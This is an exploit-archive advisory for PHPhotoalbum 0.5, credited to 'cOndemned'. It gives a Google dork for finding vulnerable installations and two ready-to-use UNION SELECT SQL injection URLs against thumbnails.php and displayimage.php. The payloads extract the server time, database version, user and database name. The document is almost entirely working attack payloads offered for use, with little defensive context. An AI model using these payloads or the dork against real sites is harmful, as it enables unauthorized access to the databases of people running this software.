id: 3075
date: 05/27/2008
title: PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities
author: cOndemned
cves: 

==============================================================
PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities
==============================================================


###############################################################################
#
#   Name   : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities
#   Author : cOndemned
#   Dork   : intext:PHPhotoalbum v0.5
#   Greetz : ZaBeaTy, TBH, Hawk, doctor, Sandtalker, Avantura ;**
#
###############################################################################

Proof of Concept : 

    http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/*
    
    http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/*




#  0day.today [2023-03-21]  #